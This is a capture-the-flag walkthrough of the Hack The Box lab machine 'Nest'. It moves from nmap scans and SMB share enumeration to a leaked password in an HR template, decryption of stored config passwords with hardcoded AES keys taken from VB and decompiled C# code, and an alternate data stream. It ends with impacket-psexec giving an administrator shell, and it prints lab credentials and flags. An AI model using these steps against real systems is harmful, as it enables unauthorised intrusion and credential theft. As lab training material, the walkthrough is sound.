Nest

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.178 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Wed Mar 29 19:37:01 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.044s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
4386/tcp open  unknown

# Nmap done at Wed Mar 29 19:37:27 2023 -- 1 IP address (1 host up) scanned in 26.45 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p445,4386 10.10.10.178 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Wed Mar 29 19:40:14 2023 as: nmap -sCV -p445,4386 -Pn -n -oN targeted 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.035s latency).

PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.93%I=7%D=3/29%Time=64247805%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki
SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR
SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2
SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20
SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R
SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2
SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>");

Host script results:
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-29T17:42:53
|_  start_date: 2023-03-29T17:36:15

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 29 19:43:33 2023 -- 1 IP address (1 host up) scanned in 199.09 seconds

Port 4386 hosts a reporting service where we can run some commands. Note that the DEBUG command asks for a password. Let's keep this in mind for the future.

telnet 10.10.10.178 4386

Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

We can browse through the system directories and list their contents.

setdir /
list

Current directory set to C:
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  $Recycle.Bin
[DIR]  Boot
[DIR]  Documents and Settings
[DIR]  PerfLogs
[DIR]  Program Files
[DIR]  Program Files (x86)
[DIR]  ProgramData
[DIR]  Recovery
[DIR]  Shares
[DIR]  System Volume Information
[DIR]  Users
[DIR]  Windows
[1]   bootmgr
[2]   BOOTSECT.BAK
[3]   pagefile.sys
[4]   restartsvc.bat

Current Directory: C:

The SMB service has a few readable shares.

smbmap -H 10.10.10.178 -u "guest"

[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                            Permissions     Comment
        ----                                            -----------     -------
        ADMIN$                                          NO ACCESS       Remote Admin
        C$                                              NO ACCESS       Default share
        Data                                            READ ONLY
        IPC$                                            NO ACCESS       Remote IPC
        Secure$                                         NO ACCESS
        Users                                           READ ONLY

Exploitation

Let's mount the Data share to our local system.

mkdir /mnt/Data
mount -t cifs //10.10.10.178/Data /mnt/Data/

There are two .txt files in the share.

tree -fas /mnt/Data/

[       4096]  /mnt/Data
├── [          0]  /mnt/Data/IT
├── [          0]  /mnt/Data/Production
├── [          0]  /mnt/Data/Reports
└── [          0]  /mnt/Data/Shared
    ├── [          0]  /mnt/Data/Shared/Maintenance
    │   └── [         48]  /mnt/Data/Shared/Maintenance/Maintenance Alerts.txt
    └── [          0]  /mnt/Data/Shared/Templates
        ├── [          0]  /mnt/Data/Shared/Templates/HR
        │   └── [        425]  /mnt/Data/Shared/Templates/HR/Welcome Email.txt
        └── [          0]  /mnt/Data/Shared/Templates/Marketing

9 directories, 2 files

The Welcome Email.txt file has credentials for the TempUser user.

cat /mnt/Data/Shared/Templates/HR/Welcome\ Email.txt

We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR

These credentials gives read access to one more share called Secure$.

smbmap -H 10.10.10.178 -u "TempUser" -p "welcome2019"

[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                            Permissions     Comment
        ----                                            -----------     -------
        ADMIN$                                          NO ACCESS       Remote Admin
        C$                                              NO ACCESS       Default share
        Data                                            READ ONLY
        IPC$                                            NO ACCESS       Remote IPC
        Secure$                                         READ ONLY
        Users                                           READ ONLY

We could try to mount the Data share to our local system, but this time using the found credentials.

umount /mnt/Data
mount -t cifs //10.10.10.178/Data /mnt/Data/ -o username=TempUser,password=welcome2019,domain=WORKGROUP,rw

Now we got access to much more files.

tree -fas /mnt/Data/

[       4096]  /mnt/Data
├── [          0]  /mnt/Data/IT
│   ├── [          0]  /mnt/Data/IT/Archive
│   ├── [          0]  /mnt/Data/IT/Configs
│   │   ├── [          0]  /mnt/Data/IT/Configs/Adobe
│   │   │   ├── [        246]  /mnt/Data/IT/Configs/Adobe/editing.xml
│   │   │   ├── [          0]  /mnt/Data/IT/Configs/Adobe/Options.txt
│   │   │   ├── [        258]  /mnt/Data/IT/Configs/Adobe/projects.xml
│   │   │   └── [       1274]  /mnt/Data/IT/Configs/Adobe/settings.xml
│   │   ├── [          0]  /mnt/Data/IT/Configs/Atlas
│   │   │   └── [       1369]  /mnt/Data/IT/Configs/Atlas/Temp.XML
│   │   ├── [          0]  /mnt/Data/IT/Configs/DLink
│   │   ├── [          0]  /mnt/Data/IT/Configs/Microsoft
│   │   │   └── [       4598]  /mnt/Data/IT/Configs/Microsoft/Options.xml
│   │   ├── [          0]  /mnt/Data/IT/Configs/NotepadPlusPlus
│   │   │   ├── [       6451]  /mnt/Data/IT/Configs/NotepadPlusPlus/config.xml
│   │   │   └── [       2108]  /mnt/Data/IT/Configs/NotepadPlusPlus/shortcuts.xml
│   │   ├── [          0]  /mnt/Data/IT/Configs/RU Scanner
│   │   │   └── [        270]  /mnt/Data/IT/Configs/RU Scanner/RU_config.xml
│   │   └── [          0]  /mnt/Data/IT/Configs/Server Manager
│   ├── [          0]  /mnt/Data/IT/Installs
│   ├── [          0]  /mnt/Data/IT/Reports
│   └── [          0]  /mnt/Data/IT/Tools
├── [          0]  /mnt/Data/Production
├── [          0]  /mnt/Data/Reports
└── [          0]  /mnt/Data/Shared
    ├── [          0]  /mnt/Data/Shared/Maintenance
    │   └── [         48]  /mnt/Data/Shared/Maintenance/Maintenance Alerts.txt
    └── [          0]  /mnt/Data/Shared/Templates
        ├── [          0]  /mnt/Data/Shared/Templates/HR
        │   └── [        425]  /mnt/Data/Shared/Templates/HR/Welcome Email.txt
        └── [          0]  /mnt/Data/Shared/Templates/Marketing

21 directories, 11 files

The RU_config.xml file contains encrypted credentials. We need to find a way to decrypt it.

catn /mnt/Data/IT/Configs/RU\ Scanner/RU_config.xml

<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

There is also a file with absolute paths.

cat /mnt/Data/IT/Configs/NotepadPlusPlus/config.xml

...
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
...

Note the \\HTB-NEST\Secure$\IT\Carl\Temp.txt share path. Let's mount the Secure$.

mkdir /mnt/Secure$
mount -t cifs //10.10.10.178/Secure$ /mnt/Secure$/ -o username=TempUser,password=welcome2019,domain=WORKGROUP,rw

We are not allowed to access \Secure$\IT\.

ls -la /mnt/Secure$/IT

ls: reading directory '/mnt/Secure$/IT': Permission denied
total 0

But we are allowed to access \Secure$\IT\Carl.

ls -la /mnt/Secure$/IT/Carl

total 0
drwxr-xr-x 2 root root 0 Aug  7  2019  .
drwxr-xr-x 2 root root 0 Aug  8  2019  ..
drwxr-xr-x 2 root root 0 Aug  7  2019  Docs
drwxr-xr-x 2 root root 0 Aug  6  2019  Reports
drwxr-xr-x 2 root root 0 Aug  6  2019 'VB Projects'

As we can see, there is a visual basic project inside VB Projects.

tree -fas /mnt/Secure$/IT/Carl

[          0]  /mnt/Secure$/IT/Carl
├── [          0]  /mnt/Secure$/IT/Carl/Docs
│   ├── [         56]  /mnt/Secure$/IT/Carl/Docs/ip.txt
│   └── [         73]  /mnt/Secure$/IT/Carl/Docs/mmc.txt
├── [          0]  /mnt/Secure$/IT/Carl/Reports
└── [          0]  /mnt/Secure$/IT/Carl/VB Projects
    ├── [          0]  /mnt/Secure$/IT/Carl/VB Projects/Production
    └── [          0]  /mnt/Secure$/IT/Carl/VB Projects/WIP
        └── [          0]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU
            ├── [          0]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner
            │   ├── [          0]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/bin
            │   │   ├── [          0]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/bin/Debug
            │   │   └── [          0]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/bin/Release
            │   ├── [        772]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/ConfigFile.vb
            │   ├── [        279]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/Module1.vb
            │   ├── [          0]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project
            │   │   ├── [        441]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
            │   │   ├── [        481]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
            │   │   ├── [       1163]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
            │   │   ├── [       2776]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
            │   │   ├── [       5612]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
            │   │   ├── [       2989]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
            │   │   └── [        279]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
            │   ├── [          0]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/obj
            │   │   └── [          0]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/obj/x86
            │   ├── [       4828]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
            │   ├── [        143]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
            │   ├── [        133]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
            │   └── [       4888]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/Utils.vb
            └── [        871]  /mnt/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner.sln

14 directories, 16 files

The Module1.vb is trying to decrypt an encrypted password from the RU_Config.xml file.

cat /mnt/Secure$/IT/Carl/VB\ Projects/WIP/RU/RUScanner/Module1.vb

Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
       

    End Sub

End Module

It is using the SsoIntegration.vb file.

cat /mnt/Secure$/IT/Carl/VB\ Projects/WIP/RU/RUScanner/SsoIntegration.vb

Public Class SsoIntegration

    Public Property Username As String
    Public Property Password As String


End Class

And it is using the Utils.vb file, which has all the functions needed to decrypt the password.

catn /mnt/Secure$/IT/Carl/VB\ Projects/WIP/RU/RUScanner/Utils.vb

Imports System.Text

Imports System.Security.Cryptography

Public Class Utils



    Public Shared Function GetLogFilePath() As String

        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")

    End Function









    Public Shared Function DecryptString(EncryptedString As String) As String

        If String.IsNullOrEmpty(EncryptedString) Then

            Return String.Empty

        Else

            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)

        End If

    End Function



    Public Shared Function EncryptString(PlainString As String) As String

        If String.IsNullOrEmpty(PlainString) Then

            Return String.Empty

        Else

            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)

        End If

    End Function



    Public Shared Function Encrypt(ByVal plainText As String, _

                                   ByVal passPhrase As String, _

                                   ByVal saltValue As String, _

                                    ByVal passwordIterations As Integer, _

                                   ByVal initVector As String, _

                                   ByVal keySize As Integer) _

                           As String



        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)

        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _

                                           saltValueBytes, _

                                           passwordIterations)

        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider

        symmetricKey.Mode = CipherMode.CBC

        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)

        Using memoryStream As New IO.MemoryStream()

            Using cryptoStream As New CryptoStream(memoryStream, _

                                            encryptor, _

                                            CryptoStreamMode.Write)

                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)

                cryptoStream.FlushFinalBlock()

                Dim cipherTextBytes As Byte() = memoryStream.ToArray()

                memoryStream.Close()

                cryptoStream.Close()

                Return Convert.ToBase64String(cipherTextBytes)

            End Using

        End Using

    End Function



    Public Shared Function Decrypt(ByVal cipherText As String, _

                                   ByVal passPhrase As String, _

                                   ByVal saltValue As String, _

                                    ByVal passwordIterations As Integer, _

                                   ByVal initVector As String, _

                                   ByVal keySize As Integer) _

                           As String



        Dim initVectorBytes As Byte()

        initVectorBytes = Encoding.ASCII.GetBytes(initVector)



        Dim saltValueBytes As Byte()

        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)



        Dim cipherTextBytes As Byte()

        cipherTextBytes = Convert.FromBase64String(cipherText)



        Dim password As New Rfc2898DeriveBytes(passPhrase, _

                                           saltValueBytes, _

                                           passwordIterations)



        Dim keyBytes As Byte()

        keyBytes = password.GetBytes(CInt(keySize / 8))



        Dim symmetricKey As New AesCryptoServiceProvider

        symmetricKey.Mode = CipherMode.CBC



        Dim decryptor As ICryptoTransform

        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)



        Dim memoryStream As IO.MemoryStream

        memoryStream = New IO.MemoryStream(cipherTextBytes)



        Dim cryptoStream As CryptoStream

        cryptoStream = New CryptoStream(memoryStream, _

                                        decryptor, _

                                        CryptoStreamMode.Read)



        Dim plainTextBytes As Byte()

        ReDim plainTextBytes(cipherTextBytes.Length)



        Dim decryptedByteCount As Integer

        decryptedByteCount = cryptoStream.Read(plainTextBytes, _

                                               0, _

                                               plainTextBytes.Length)



        memoryStream.Close()

        cryptoStream.Close()



        Dim plainText As String

        plainText = Encoding.ASCII.GetString(plainTextBytes, _

                                            0, _

                                            decryptedByteCount)



        Return plainText

    End Function













End Class

I will use dotnetfiddle.net and try to build a script with all these files which will decrypt the password. I will remove all the encrypt functions, because I don't need them, and add the public function where I set the username and encrypted password, and a print statement to show to decrypted password in plain text.

Imports System.Text
Imports System.Security.Cryptography
Imports System
Public Class Utils

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

		System.Console.WriteLine(plainText)
		Return plainText
    End Function

	Public Class SsoIntegration

    	Public Property Username As String
    	Public Property Password As String

	End Class

	
	Sub Main()
				Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")}			
	End Sub

End Class

If we run the script, we'll get the password for the c.smith user.

Now we can access the c.smith directory in the Users share, where the user flag is located.

mount -t cifs //10.10.10.178/Users /mnt/Users/ -o username=c.smith,password=xRxRxPANCAK3SxRxRx,domain=WORKGROUP,rw
cat cat /mnt/Users/C.Smith/user.txt

98d281e9e504b2674b44ec622fb8c485

Privilege Escalation

As we can see, there is a binary called HqkLdap.exe, which could be the service exposed through port 4386.

tree -fas /mnt/Users/C.Smith/

[          0]  /mnt/Users/C.Smith
├── [          0]  /mnt/Users/C.Smith/HQK Reporting
│   ├── [          0]  /mnt/Users/C.Smith/HQK Reporting/AD Integration Module
│   │   └── [      17408]  /mnt/Users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe
│   ├── [          0]  /mnt/Users/C.Smith/HQK Reporting/Debug Mode Password.txt
│   └── [        249]  /mnt/Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml
└── [         34]  /mnt/Users/C.Smith/user.txt

3 directories, 4 files

There is also the Debug Mode Password.txt file, which should have the password for the DEBUG mode, but it is empty.

cat /mnt/Users/C.Smith/HQK\ Reporting/Debug\ Mode\ Password.txt

File: /mnt/Users/C.Smith/HQK Reporting/Debug Mode Password.txt   <EMPTY>

Let's connect to the share with smbclient, and check for alternative data streams on the file.

Alternate Data Streams have the ability of forking data into an existing file without changing its file size or functionality.

smbclient //10.10.10.178/Users -U "c.smith%xRxRxPANCAK3SxRxRx"
allinfo "C.Smith\HQK Reporting\Debug Mode Password.txt"

Try "help" to get a list of possible commands.
smb: \> allinfo "C.Smith\HQK Reporting\Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Fri Aug  9 01:06:12 AM 2019 CEST
access_time:    Fri Aug  9 01:06:12 AM 2019 CEST
write_time:     Fri Aug  9 01:08:17 AM 2019 CEST
change_time:    Wed Jul 21 08:47:12 PM 2021 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

There is one alternative data stream called :Password. Let's download it.

get "C.Smith\HQK Reporting\Debug Mode Password.txt:Password"

Now we have another password.

cat Debug\ Mode\ Password.txt:Password

WBQ201953D8w

This password seems to be valid for the DEBUG mode we saw earlier. With this mode, we can run more commands.

DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

If we go back one directory, we'll see a directory called LDAP.

SETDIR ..
LIST

Current directory set to HQK
>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

Inside there is a file called Ldap.conf with another encrypted password for the administrator user.

SETDIR LDAP
LIST
SHOWQUERY 2

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>SHOWQUERY Ldap.conf

Error: Input string was not in a correct format.
>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>SHOWQUERY 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

We need to find a way to decrypt it. Transfer the binary to a Windows machine with dotPeek installed and try to reverse engineer the binary to get its source code. Open the file with dotPeek.

Then, double-click on HqKLdap > HqKLda > CR to view the source code.

Copy the code and paste it into dotnetfiddle.net. Modify it so it doesn't give any errors.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

  public class CR
  {
    private const string K = "667912";
    private const string I = "1L1SA61493DRV53Z";
    private const string SA = "1313Rf99";

    public static string DS(string EncryptedString){
		return string.IsNullOrEmpty(EncryptedString) ? string.Empty : CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
	}


    private static string RD(
      string cipherText,
      string passPhrase,
      string saltValue,
      int passwordIterations,
      string initVector,
      int keySize)
    {
      byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
      byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
      byte[] buffer = Convert.FromBase64String(cipherText);
      byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked ((int) Math.Round(unchecked ((double) keySize / 8.0))));
      AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
      cryptoServiceProvider.Mode = CipherMode.CBC;
      ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
      MemoryStream memoryStream = new MemoryStream(buffer);
      CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read);
      byte[] numArray = new byte[checked (buffer.Length + 1)];
      int count = cryptoStream.Read(numArray, 0, numArray.Length);
      memoryStream.Close();
      cryptoStream.Close();
	  System.Console.WriteLine(Encoding.ASCII.GetString(numArray, 0, count));
      return Encoding.ASCII.GetString(numArray, 0, count);
    }
	public static void Main(){
		DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=");
	}
  }

We should get the administrator's password.

Finally, we can get a shell as the administrator, all then all we have to do is reap the harvest and take the root flag.

impacket-psexec administrator@10.10.10.178

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password: XtH4nkS4Pl4y1nGX
[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file IIBgZdGq.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service jghV on 10.10.10.178.....
[*] Starting service jghV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> type \users\administrator\desktop\root.txt
8cfdc59ec0118ddcf0d51e57617f4f58

Last updated 2 years ago

Was this helpful?

hashtagEnumeration

hashtagExploitation

hashtagPrivilege Escalation

Enumeration

Exploitation

Privilege Escalation